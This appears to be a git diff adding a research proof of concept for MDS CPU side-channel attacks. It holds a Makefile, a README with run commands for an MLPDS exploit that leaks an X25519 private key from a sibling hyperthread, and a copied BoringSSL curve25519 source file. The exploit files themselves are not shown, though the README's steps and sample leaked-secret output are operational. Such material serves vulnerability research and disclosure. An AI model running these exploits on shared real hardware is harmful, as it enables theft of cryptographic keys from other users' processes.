diff --git a/pocs/cpus/mds-x25519/Makefile b/pocs/cpus/mds-x25519/Makefile
new file mode 100644
index 00000000..91ec33f7
--- /dev/null
+++ b/pocs/cpus/mds-x25519/Makefile
@@ -0,0 +1,21 @@
+.PHONY: all clean
+CFLAGS=-O3 -mrtm -static -masm=intel
+CURVE_DIR=boringssl/crypto/curve25519
+
+all: leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim
+
+# Clone BoringSSL on demand; every rule that reads the checkout depends on it.
+$(CURVE_DIR)/curve25519.c:
+	git clone https://boringssl.googlesource.com/boringssl
+# fake_x25519.c is copied into the checkout so its relative #includes resolve.
+$(CURVE_DIR)/fake_x25519.c: fake_x25519.c | $(CURVE_DIR)/curve25519.c
+	cp $< $@
+
+leak_intermediate_x25519 leak_multiprocess: %: $(CURVE_DIR)/fake_x25519.c %.c
+	$(CC) $^  -o $@ $(CFLAGS) -Iboringssl/include
+
+x25519_victim: $(CURVE_DIR)/curve25519.c x25519_victim.c
+	$(CC) $^  -o $@ $(CFLAGS) -Iboringssl/include -lssl -lcrypto
+
+clean:
+	- rm -rf leak_evict_x25519 leak_intermediate_x25519 leak_multiprocess x25519_victim boringssl
diff --git a/pocs/cpus/mds-x25519/README.md b/pocs/cpus/mds-x25519/README.md
new file mode 100644
index 00000000..67da441e
--- /dev/null
+++ b/pocs/cpus/mds-x25519/README.md
@@ -0,0 +1,57 @@
+
+
+# MDS exploits
+
+## How to run
+
+The RIDL exploit, `leak_evict_x25519.c`, unfortunately targets an internal
+server, so you won't be able to reproduce our results.
+
+The MLPDS exploit, although it targets the same server, does not depend on
+its memory layout, so we prepared a custom victim that just calls the `X25519`
+function in an infinite loop. To run it, first compile the code:
+
+```
+make
+```
+
+This will also clone the BoringSSL repository (it's a dependency).
+Check how many logical CPUs your machine has:
+
+```
+nproc --all
+```
+
+For my workstation, it prints `12`, which means I have 6 physical cores (with
+hyperthreading doubling the number of logical CPUs). Run the victim:
+
+```
+taskset -a -c 2 ./x25519_victim
+```
+
+In another terminal, run the exploit:
+
+```
+taskset -a -c 8 ./leak_intermediate_x25519 <<< "1 2 3 4 5 6 7 8 9 a b c d e f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20"
+```
+
+The `1 2 3...` string is the client private key used in X25519.
+Note that I pin the two processes to CPUs 2 and 8, which are 6 apart - on my
+6-core machine these are sibling hyperthreads of one physical core. You should
+see some intermediate output pretty quickly, and after 255 iterations (say 10 minutes,
+depending on CPU), the process will finish. The last line will show the leaked secret:
+
+```
+Secret: 70 72 69 76 74 65 73 74 31 32 33 34 35 36 37 38 73 6f 6d 65 6d 6f 72 65 62 69 74 73 41 42 43 44
+```
+
+If you decode the hexadecimal, it says `privtest12345678somemorebitsABCD`, which
+was the private key hardcoded in `x25519_victim.c`.
+
+If you wait several minutes and only ever get the `--- diff_abs 0 (0 vs. 0, total 0)`
+result, something's wrong. Check that hyperthreading is enabled and that your
+CPU supports TSX and TSX has not been disabled.
+
+If you want to try the multithreaded exploit, `leak_multiprocess.c`, change
+`#define CPU_NUM 6` to the actual number of cores in your CPU before
+compiling. Other than that, the usage is the same.
diff --git a/pocs/cpus/mds-x25519/fake_x25519.c b/pocs/cpus/mds-x25519/fake_x25519.c
new file mode 100644
index 00000000..71f4deda
--- /dev/null
+++ b/pocs/cpus/mds-x25519/fake_x25519.c
@@ -0,0 +1,1850 @@
+/* Copyright (c) 2020, Google Inc.
+ *
+ * Permission to use, copy, modify, and/or distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
+ * SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
+ * OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
+ * CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */
+// Some of this code is taken from the ref10 version of Ed25519 in SUPERCOP
+// 20141124 (http://bench.cr.yp.to/supercop.html). That code is released as
+// public domain. Other parts have been replaced to call into code generated by
+// Fiat (https://github.com/mit-plv/fiat-crypto) in //third_party/fiat.
+//
+// The field functions are shared by Ed25519 and X25519 where possible.
+#include <openssl/curve25519.h>
+#include <assert.h>
+#include <string.h>
+#include <openssl/mem.h>
+#include <openssl/rand.h>
+#include <openssl/sha.h>
+#include <openssl/type_check.h>
+#include "internal.h"
+#include "../internal.h"
+// Various pre-computed constants.
+#include "./curve25519_tables.h"
+#if defined(OPENSSL_NO_ASM)
+#define FIAT_25519_NO_ASM
+#endif
+#if defined(BORINGSSL_CURVE25519_64BIT)
+#include "../../third_party/fiat/curve25519_64.h"
+#else
+#include "../../third_party/fiat/curve25519_32.h"
+#endif  // BORINGSSL_CURVE25519_64BIT
+// Low-level intrinsic operations
+// load_3 reads three bytes at |in| as a little-endian 24-bit integer.
+static uint64_t load_3(const uint8_t *in) {
+  const uint64_t b0 = in[0];
+  const uint64_t b1 = in[1];
+  const uint64_t b2 = in[2];
+  return b0 | (b1 << 8) | (b2 << 16);
+}
+// load_4 reads four bytes at |in| as a little-endian 32-bit integer.
+static uint64_t load_4(const uint8_t *in) {
+  uint64_t value = 0;
+  for (unsigned i = 0; i < 4; i++) {
+    value |= (uint64_t)in[i] << (8 * i);
+  }
+  return value;
+}
+// Field operations.
+#if defined(BORINGSSL_CURVE25519_64BIT)
+typedef uint64_t fe_limb_t;  // one limb of a field element (64-bit build)
+#define FE_NUM_LIMBS 5  // number of limbs per field element (64-bit build)
+// assert_fe asserts that each of the five limbs of |f| is within tight bounds:
+//
+//  [[0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc],
+//   [0x0 ~> 0x8cccccccccccc]]
+//
+// See comments in curve25519_64.h for which functions use these bounds for
+// inputs or outputs. Like any assert(), the check vanishes under NDEBUG.
+#define assert_fe(f)                                                    \
+  do {                                                                  \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <= UINT64_C(0x8cccccccccccc));             \
+    }                                                                   \
+  } while (0)
+// assert_fe_loose asserts that each of the five limbs of |f| is within loose bounds:
+//
+//  [[0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664],
+//   [0x0 ~> 0x1a666666666664]]
+//
+// See comments in curve25519_64.h for which functions use these bounds for
+// inputs or outputs. Like any assert(), the check vanishes under NDEBUG.
+#define assert_fe_loose(f)                                              \
+  do {                                                                  \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 5; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <= UINT64_C(0x1a666666666664));            \
+    }                                                                   \
+  } while (0)
+#else
+typedef uint32_t fe_limb_t;  // one limb of a field element (32-bit build)
+#define FE_NUM_LIMBS 10  // number of limbs per field element (32-bit build)
+// assert_fe asserts that the ten limbs of |f| are within tight bounds, which
+// alternate between even-indexed and odd-indexed limbs:
+//  [[0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333],
+//   [0x0 ~> 0x4666666], [0x0 ~> 0x2333333]]
+//
+// See comments in curve25519_32.h for which functions use these bounds for
+// inputs or outputs. Like any assert(), the check vanishes under NDEBUG.
+#define assert_fe(f)                                                     \
+  do {                                                                   \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <=                                          \
+             ((_assert_fe_i & 1) ? 0x2333333u : 0x4666666u));            \
+    }                                                                    \
+  } while (0)
+// assert_fe_loose asserts that the ten limbs of |f| are within loose bounds,
+// which alternate between even-indexed and odd-indexed limbs:
+//  [[0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999],
+//   [0x0 ~> 0xd333332], [0x0 ~> 0x6999999]]
+//
+// See comments in curve25519_32.h for which functions use these bounds for
+// inputs or outputs. Like any assert(), the check vanishes under NDEBUG.
+#define assert_fe_loose(f)                                               \
+  do {                                                                   \
+    for (unsigned _assert_fe_i = 0; _assert_fe_i < 10; _assert_fe_i++) { \
+      assert(f[_assert_fe_i] <=                                          \
+             ((_assert_fe_i & 1) ? 0x6999999u : 0xd333332u));            \
+    }                                                                    \
+  } while (0)
+#endif  // BORINGSSL_CURVE25519_64BIT
+// Disabled: OPENSSL_STATIC_ASSERT(sizeof(fe) == sizeof(fe_limb_t) * FE_NUM_LIMBS).
+#undef OPENSSL_STATIC_ASSERT  // drop any earlier definition before stubbing it
+#define OPENSSL_STATIC_ASSERT(...)  // later uses in this file expand to nothing
+static void fe_frombytes_strict(fe *h, const uint8_t s[32]) {  // h = decode(s)
+  // |fiat_25519_from_bytes| requires the top-most bit be clear.
+  assert((s[31] & 0x80) == 0);
+  fiat_25519_from_bytes(h->v, s);
+  assert_fe(h->v);  // the decoded limbs must satisfy the tight bounds
+}
+static void fe_frombytes(fe *h, const uint8_t s[32]) {  // decode, ignoring bit 255
+  uint8_t s_copy[32];
+  OPENSSL_memcpy(s_copy, s, 32);  // work on a copy; the caller's |s| is const
+  s_copy[31] &= 0x7f;  // clear the top bit, as |fe_frombytes_strict| asserts
+  fe_frombytes_strict(h, s_copy);
+}
+static void fe_tobytes(uint8_t s[32], const fe *f) {  // s = 32-byte encoding of f
+  assert_fe(f->v);  // input must be tight
+  fiat_25519_to_bytes(s, f->v);
+}
+// fe_0 sets h = 0 by zeroing the whole |fe|.
+static void fe_0(fe *h) {
+  OPENSSL_memset(h, 0, sizeof(fe));
+}
+static void fe_loose_0(fe_loose *h) {  // h = 0, for the loose type
+  OPENSSL_memset(h, 0, sizeof(fe_loose));
+}
+// fe_1 sets h = 1: all limbs zero except the lowest, which becomes 1.
+static void fe_1(fe *h) {
+  OPENSSL_memset(h, 0, sizeof(fe));
+  h->v[0] = 1;
+}
+static void fe_loose_1(fe_loose *h) {  // h = 1, for the loose type
+  OPENSSL_memset(h, 0, sizeof(fe_loose));
+  h->v[0] = 1;  // lowest limb carries the value
+}
+// fe_add sets h = f + g. Inputs must be tight; the sum is only loosely bounded.
+// Can overlap h with f or g.
+static void fe_add(fe_loose *h, const fe *f, const fe *g) {
+  assert_fe(f->v);
+  assert_fe(g->v);
+  fiat_25519_add(h->v, f->v, g->v);
+  assert_fe_loose(h->v);
+}
+// fe_sub sets h = f - g. Inputs must be tight; the result is only loosely bounded.
+// Can overlap h with f or g.
+static void fe_sub(fe_loose *h, const fe *f, const fe *g) {
+  assert_fe(f->v);
+  assert_fe(g->v);
+  fiat_25519_sub(h->v, f->v, g->v);
+  assert_fe_loose(h->v);
+}
+static void fe_carry(fe *h, const fe_loose* f) {  // loose |f| -> tight |h|
+  assert_fe_loose(f->v);
+  fiat_25519_carry(h->v, f->v);
+  assert_fe(h->v);  // output is asserted to meet the tight bounds
+}
+static void fe_mul_impl(fe_limb_t out[FE_NUM_LIMBS],  // out = in1 * in2
+                        const fe_limb_t in1[FE_NUM_LIMBS],
+                        const fe_limb_t in2[FE_NUM_LIMBS]) {
+  assert_fe_loose(in1);  // loose bounds are enough for either operand
+  assert_fe_loose(in2);
+  fiat_25519_carry_mul(out, in1, in2);
+  assert_fe(out);  // the product comes back tight
+}
+static void fe_mul_ltt(fe_loose *h, const fe *f, const fe *g) {  // h = f * g
+  fe_mul_impl(h->v, f->v, g->v);  // suffix = types of (h, f, g): l = fe_loose, t = fe
+}
+static void fe_mul_llt(fe_loose *h, const fe_loose *f, const fe *g) {  // h = f * g
+  fe_mul_impl(h->v, f->v, g->v);  // loose h, loose f, tight g
+}
+static void fe_mul_ttt(fe *h, const fe *f, const fe *g) {  // h = f * g
+  fe_mul_impl(h->v, f->v, g->v);  // tight h, tight f, tight g
+}
+static void fe_mul_tlt(fe *h, const fe_loose *f, const fe *g) {  // h = f * g
+  fe_mul_impl(h->v, f->v, g->v);  // tight h, loose f, tight g
+}
+static void fe_mul_ttl(fe *h, const fe *f, const fe_loose *g) {  // h = f * g
+  fe_mul_impl(h->v, f->v, g->v);  // tight h, tight f, loose g
+}
+static void fe_mul_tll(fe *h, const fe_loose *f, const fe_loose *g) {  // h = f * g
+  fe_mul_impl(h->v, f->v, g->v);  // tight h, loose f, loose g
+}
+static void fe_sq_tl(fe *h, const fe_loose *f) {  // h = f^2; tight out, loose in
+  assert_fe_loose(f->v);
+  fiat_25519_carry_square(h->v, f->v);
+  assert_fe(h->v);
+}
+static void fe_sq_tt(fe *h, const fe *f) {  // h = f^2; tight out, tight in
+  assert_fe_loose(f->v);  // only the loose bound is checked, though |f| is typed tight
+  fiat_25519_carry_square(h->v, f->v);
+  assert_fe(h->v);
+}
+// fe_cswap exchanges |f| and |g| when |b| is 1 and leaves both untouched when
+// |b| is 0. The choice is applied limb by limb with XOR/AND masking.
+//
+// Preconditions: b in {0,1}.
+static void fe_cswap(fe *f, fe *g, fe_limb_t b) {
+  // 0 - b is all-zero bits for b == 0 and all-one bits for b == 1.
+  const fe_limb_t mask = 0 - b;
+  for (unsigned limb = 0; limb < FE_NUM_LIMBS; limb++) {
+    const fe_limb_t delta = (f->v[limb] ^ g->v[limb]) & mask;
+    f->v[limb] ^= delta;
+    g->v[limb] ^= delta;
+  }
+}
+static void fe_mul121666(fe *h, const fe_loose *f) {  // presumably h = 121666 * f, per the fiat routine's name
+  assert_fe_loose(f->v);
+  fiat_25519_carry_scmul_121666(h->v, f->v);
+  assert_fe(h->v);  // result is asserted tight
+}
+// fe_neg sets h = -f. The input must be tight; the result is loosely bounded.
+static void fe_neg(fe_loose *h, const fe *f) {
+  assert_fe(f->v);
+  fiat_25519_opp(h->v, f->v);
+  assert_fe_loose(h->v);
+}
+// fe_cmov overwrites |f| with |g| when |b| is 1 and leaves |f| unchanged when
+// |b| is 0; |g| is never modified. The choice is applied with XOR/AND masking.
+//
+// Preconditions: b in {0,1}.
+static void fe_cmov(fe_loose *f, const fe_loose *g, fe_limb_t b) {
+  // Silence an unused function warning. |fiat_25519_selectznz| isn't quite the
+  // calling convention the rest of this code wants, so implement it by hand.
+  //
+  // TODO(davidben): Switch to fiat's calling convention, or ask fiat to emit a
+  // different one.
+  (void)fiat_25519_selectznz;
+  // 0 - b is all-zero bits for b == 0 and all-one bits for b == 1.
+  const fe_limb_t mask = 0 - b;
+  for (unsigned limb = 0; limb < FE_NUM_LIMBS; limb++) {
+    const fe_limb_t delta = (f->v[limb] ^ g->v[limb]) & mask;
+    f->v[limb] ^= delta;
+  }
+}
+// fe_copy sets h = f. memmove is used, so |h| and |f| may overlap.
+static void fe_copy(fe *h, const fe *f) {
+  OPENSSL_memmove(h, f, sizeof(fe));
+}
+static void fe_copy_lt(fe_loose *h, const fe *f) {  // h = f, tight -> loose
+  OPENSSL_STATIC_ASSERT(sizeof(fe_loose) == sizeof(fe),
+                        "fe and fe_loose mismatch");
+  OPENSSL_memmove(h, f, sizeof(fe));  // raw byte copy; relies on equal sizes
+}
+#if !defined(OPENSSL_SMALL)
+static void fe_copy_ll(fe_loose *h, const fe_loose *f) {  // h = f, loose -> loose
+  OPENSSL_memmove(h, f, sizeof(fe_loose));  // used by |table_select| in this build
+}
+#endif // !defined(OPENSSL_SMALL)
+static void fe_loose_invert(fe *out, const fe_loose *z) {  // out = z^(2^255 - 21)
+  fe t0;  // with p = 2^255 - 19 that exponent is p - 2, so out = 1/z
+  fe t1;
+  fe t2;
+  fe t3;
+  int i;
+  fe_sq_tl(&t0, z);  // t0 = z^2
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 2; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^8
+  fe_mul_tlt(&t1, z, &t1);  // t1 = z^9
+  fe_mul_ttt(&t0, &t0, &t1);  // t0 = z^11
+  fe_sq_tt(&t2, &t0);  // t2 = z^22
+  fe_mul_ttt(&t1, &t1, &t2);  // t1 = z^31 = z^(2^5 - 1)
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 5; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }  // t2 = z^(2^10 - 2^5)
+  fe_mul_ttt(&t1, &t2, &t1);  // t1 = z^(2^10 - 1)
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }  // t2 = z^(2^20 - 2^10)
+  fe_mul_ttt(&t2, &t2, &t1);  // t2 = z^(2^20 - 1)
+  fe_sq_tt(&t3, &t2);
+  for (i = 1; i < 20; ++i) {
+    fe_sq_tt(&t3, &t3);
+  }  // t3 = z^(2^40 - 2^20)
+  fe_mul_ttt(&t2, &t3, &t2);  // t2 = z^(2^40 - 1)
+  fe_sq_tt(&t2, &t2);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }  // t2 = z^(2^50 - 2^10)
+  fe_mul_ttt(&t1, &t2, &t1);  // t1 = z^(2^50 - 1)
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }  // t2 = z^(2^100 - 2^50)
+  fe_mul_ttt(&t2, &t2, &t1);  // t2 = z^(2^100 - 1)
+  fe_sq_tt(&t3, &t2);
+  for (i = 1; i < 100; ++i) {
+    fe_sq_tt(&t3, &t3);
+  }  // t3 = z^(2^200 - 2^100)
+  fe_mul_ttt(&t2, &t3, &t2);  // t2 = z^(2^200 - 1)
+  fe_sq_tt(&t2, &t2);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }  // t2 = z^(2^250 - 2^50)
+  fe_mul_ttt(&t1, &t2, &t1);  // t1 = z^(2^250 - 1)
+  fe_sq_tt(&t1, &t1);
+  for (i = 1; i < 5; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^(2^255 - 2^5)
+  fe_mul_ttt(out, &t1, &t0);  // out = z^(2^255 - 32 + 11) = z^(2^255 - 21)
+}
+static void fe_invert(fe *out, const fe *z) {  // tight-input wrapper for |fe_loose_invert|
+  fe_loose l;
+  fe_copy_lt(&l, z);  // re-type the tight input as loose
+  fe_loose_invert(out, &l);
+}
+// fe_isnonzero returns 1 if |f| != 0 and 0 if |f| == 0. The comparison is done
+// on the serialized bytes of the carried value via |CRYPTO_memcmp|.
+static int fe_isnonzero(const fe_loose *f) {
+  static const uint8_t kZero[32] = {0};
+  uint8_t encoded[32];
+  fe reduced;
+  fe_carry(&reduced, f);
+  fe_tobytes(encoded, &reduced);
+  return CRYPTO_memcmp(encoded, kZero, sizeof(kZero)) != 0;
+}
+// return 1 if f is in {1,3,5,...,q-2}
+// return 0 if f is in {0,2,4,...,q-1}
+static int fe_isnegative(const fe *f) {  // i.e. the parity of f's byte encoding
+  uint8_t s[32];
+  fe_tobytes(s, f);
+  return s[0] & 1;  // lowest bit of the first encoded byte
+}
+// fe_sq2_tt sets h = 2 * f^2.
+static void fe_sq2_tt(fe *h, const fe *f) {
+  fe_loose doubled;
+  // Square into |h| first, then form h + h as a loose value and carry it
+  // back into the tight output.
+  fe_sq_tt(h, f);
+  fe_add(&doubled, h, h);
+  fe_carry(h, &doubled);
+}
+static void fe_pow22523(fe *out, const fe *z) {  // out = z^(2^252 - 3)
+  fe t0;
+  fe t1;
+  fe t2;
+  int i;
+  fe_sq_tt(&t0, z);  // t0 = z^2
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 2; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^8
+  fe_mul_ttt(&t1, z, &t1);  // t1 = z^9
+  fe_mul_ttt(&t0, &t0, &t1);  // t0 = z^11
+  fe_sq_tt(&t0, &t0);  // t0 = z^22
+  fe_mul_ttt(&t0, &t1, &t0);  // t0 = z^31 = z^(2^5 - 1)
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 5; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^(2^10 - 2^5)
+  fe_mul_ttt(&t0, &t1, &t0);  // t0 = z^(2^10 - 1)
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^(2^20 - 2^10)
+  fe_mul_ttt(&t1, &t1, &t0);  // t1 = z^(2^20 - 1)
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 20; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }  // t2 = z^(2^40 - 2^20)
+  fe_mul_ttt(&t1, &t2, &t1);  // t1 = z^(2^40 - 1)
+  fe_sq_tt(&t1, &t1);
+  for (i = 1; i < 10; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^(2^50 - 2^10)
+  fe_mul_ttt(&t0, &t1, &t0);  // t0 = z^(2^50 - 1)
+  fe_sq_tt(&t1, &t0);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^(2^100 - 2^50)
+  fe_mul_ttt(&t1, &t1, &t0);  // t1 = z^(2^100 - 1)
+  fe_sq_tt(&t2, &t1);
+  for (i = 1; i < 100; ++i) {
+    fe_sq_tt(&t2, &t2);
+  }  // t2 = z^(2^200 - 2^100)
+  fe_mul_ttt(&t1, &t2, &t1);  // t1 = z^(2^200 - 1)
+  fe_sq_tt(&t1, &t1);
+  for (i = 1; i < 50; ++i) {
+    fe_sq_tt(&t1, &t1);
+  }  // t1 = z^(2^250 - 2^50)
+  fe_mul_ttt(&t0, &t1, &t0);  // t0 = z^(2^250 - 1)
+  fe_sq_tt(&t0, &t0);
+  for (i = 1; i < 2; ++i) {
+    fe_sq_tt(&t0, &t0);
+  }  // t0 = z^(2^252 - 4)
+  fe_mul_ttt(out, &t0, z);  // out = z^(2^252 - 3)
+}
+// Group operations.
+void x25519_ge_tobytes(uint8_t s[32], const ge_p2 *h) {  // s = encoding of point |h|
+  fe recip;
+  fe x;
+  fe y;
+  fe_invert(&recip, &h->Z);  // recip = 1/Z
+  fe_mul_ttt(&x, &h->X, &recip);  // x = X/Z
+  fe_mul_ttt(&y, &h->Y, &recip);  // y = Y/Z
+  fe_tobytes(s, &y);  // the encoding is y ...
+  s[31] ^= fe_isnegative(&x) << 7;  // ... with the parity of x folded into the top bit
+}
+static void ge_p3_tobytes(uint8_t s[32], const ge_p3 *h) {  // same encoding, from a ge_p3
+  fe recip;
+  fe x;
+  fe y;
+  fe_invert(&recip, &h->Z);  // recip = 1/Z
+  fe_mul_ttt(&x, &h->X, &recip);  // x = X/Z
+  fe_mul_ttt(&y, &h->Y, &recip);  // y = Y/Z
+  fe_tobytes(s, &y);  // the encoding is y ...
+  s[31] ^= fe_isnegative(&x) << 7;  // ... with the parity of x folded into the top bit
+}
+static void ge_p2_0(ge_p2 *h) {  // h = (X, Y, Z) = (0, 1, 1)
+  fe_0(&h->X);
+  fe_1(&h->Y);
+  fe_1(&h->Z);
+}
+static void ge_p3_0(ge_p3 *h) {  // h = (X, Y, Z, T) = (0, 1, 1, 0)
+  fe_0(&h->X);
+  fe_1(&h->Y);
+  fe_1(&h->Z);
+  fe_0(&h->T);
+}
+static void ge_cached_0(ge_cached *h) {  // cached form of the point set by |ge_p3_0|
+  fe_loose_1(&h->YplusX);  // Y + X = 1
+  fe_loose_1(&h->YminusX);  // Y - X = 1
+  fe_loose_1(&h->Z);
+  fe_loose_0(&h->T2d);
+}
+static void ge_precomp_0(ge_precomp *h) {  // h = (yplusx, yminusx, xy2d) = (1, 1, 0)
+  fe_loose_1(&h->yplusx);
+  fe_loose_1(&h->yminusx);
+  fe_loose_0(&h->xy2d);
+}
+// ge_p3_to_p2 sets r = p by copying X, Y and Z; the T coordinate is dropped.
+static void ge_p3_to_p2(ge_p2 *r, const ge_p3 *p) {
+  fe_copy(&r->X, &p->X);
+  fe_copy(&r->Y, &p->Y);
+  fe_copy(&r->Z, &p->Z);
+}
+// x25519_ge_p3_to_cached sets r = p, converted to the cached representation.
+void x25519_ge_p3_to_cached(ge_cached *r, const ge_p3 *p) {
+  fe_add(&r->YplusX, &p->Y, &p->X);  // Y + X
+  fe_sub(&r->YminusX, &p->Y, &p->X);  // Y - X
+  fe_copy_lt(&r->Z, &p->Z);
+  fe_mul_ltt(&r->T2d, &p->T, &d2);  // T * d2, with |d2| defined outside this function
+}
+// x25519_ge_p1p1_to_p2 sets r = p, converted from p1p1 to p2 coordinates.
+void x25519_ge_p1p1_to_p2(ge_p2 *r, const ge_p1p1 *p) {
+  fe_mul_tll(&r->X, &p->X, &p->T);  // X' = X * T
+  fe_mul_tll(&r->Y, &p->Y, &p->Z);  // Y' = Y * Z
+  fe_mul_tll(&r->Z, &p->Z, &p->T);  // Z' = Z * T
+}
+// x25519_ge_p1p1_to_p3 sets r = p, converted from p1p1 to p3 coordinates.
+void x25519_ge_p1p1_to_p3(ge_p3 *r, const ge_p1p1 *p) {
+  fe_mul_tll(&r->X, &p->X, &p->T);  // X' = X * T
+  fe_mul_tll(&r->Y, &p->Y, &p->Z);  // Y' = Y * Z
+  fe_mul_tll(&r->Z, &p->Z, &p->T);  // Z' = Z * T
+  fe_mul_tll(&r->T, &p->X, &p->Y);  // T' = X * Y
+}
+// ge_p1p1_to_cached sets r = p, going p1p1 -> p3 -> cached.
+static void ge_p1p1_to_cached(ge_cached *r, const ge_p1p1 *p) {
+  ge_p3 t;
+  x25519_ge_p1p1_to_p3(&t, p);
+  x25519_ge_p3_to_cached(r, &t);
+}
+// ge_p2_dbl sets r = 2 * p. Fields of |r| double as scratch, so order matters.
+static void ge_p2_dbl(ge_p1p1 *r, const ge_p2 *p) {
+  fe trX, trZ, trT;
+  fe t0;
+  fe_sq_tt(&trX, &p->X);  // trX = X^2
+  fe_sq_tt(&trZ, &p->Y);  // trZ = Y^2
+  fe_sq2_tt(&trT, &p->Z);  // trT = 2 * Z^2
+  fe_add(&r->Y, &p->X, &p->Y);  // r->Y = X + Y (scratch)
+  fe_sq_tl(&t0, &r->Y);  // t0 = (X + Y)^2
+  fe_add(&r->Y, &trZ, &trX);  // r->Y = Y^2 + X^2
+  fe_sub(&r->Z, &trZ, &trX);  // r->Z = Y^2 - X^2
+  fe_carry(&trZ, &r->Y);  // trZ = Y^2 + X^2, made tight
+  fe_sub(&r->X, &t0, &trZ);  // r->X = (X + Y)^2 - (Y^2 + X^2)
+  fe_carry(&trZ, &r->Z);  // trZ = Y^2 - X^2, made tight
+  fe_sub(&r->T, &trT, &trZ);  // r->T = 2 * Z^2 - (Y^2 - X^2)
+}
+// ge_p3_dbl sets r = 2 * p by dropping T and reusing |ge_p2_dbl|.
+static void ge_p3_dbl(ge_p1p1 *r, const ge_p3 *p) {
+  ge_p2 q;
+  ge_p3_to_p2(&q, p);
+  ge_p2_dbl(r, &q);
+}
+// ge_madd sets r = p + q for a precomputed |q|. Fields of |r| double as scratch.
+static void ge_madd(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) {
+  fe trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);  // r->X = Y + X (scratch)
+  fe_sub(&r->Y, &p->Y, &p->X);  // r->Y = Y - X (scratch)
+  fe_mul_tll(&trZ, &r->X, &q->yplusx);  // trZ = (Y + X) * q.yplusx
+  fe_mul_tll(&trY, &r->Y, &q->yminusx);  // trY = (Y - X) * q.yminusx
+  fe_mul_tlt(&trT, &q->xy2d, &p->T);  // trT = q.xy2d * T
+  fe_add(&r->T, &p->Z, &p->Z);  // r->T = 2 * Z (scratch)
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);  // trZ = 2 * Z, made tight
+  fe_add(&r->Z, &trZ, &trT);  // r->Z = 2 * Z + trT
+  fe_sub(&r->T, &trZ, &trT);  // r->T = 2 * Z - trT
+}
+// ge_msub sets r = p - q: |ge_madd| with q's yplusx/yminusx roles and the trT signs swapped.
+static void ge_msub(ge_p1p1 *r, const ge_p3 *p, const ge_precomp *q) {
+  fe trY, trZ, trT;
+  fe_add(&r->X, &p->Y, &p->X);  // r->X = Y + X (scratch)
+  fe_sub(&r->Y, &p->Y, &p->X);  // r->Y = Y - X (scratch)
+  fe_mul_tll(&trZ, &r->X, &q->yminusx);  // trZ = (Y + X) * q.yminusx
+  fe_mul_tll(&trY, &r->Y, &q->yplusx);  // trY = (Y - X) * q.yplusx
+  fe_mul_tlt(&trT, &q->xy2d, &p->T);  // trT = q.xy2d * T
+  fe_add(&r->T, &p->Z, &p->Z);  // r->T = 2 * Z (scratch)
+  fe_sub(&r->X, &trZ, &trY);
+  fe_add(&r->Y, &trZ, &trY);
+  fe_carry(&trZ, &r->T);  // trZ = 2 * Z, made tight
+  fe_sub(&r->Z, &trZ, &trT);  // r->Z = 2 * Z - trT
+  fe_add(&r->T, &trZ, &trT);  // r->T = 2 * Z + trT
+}
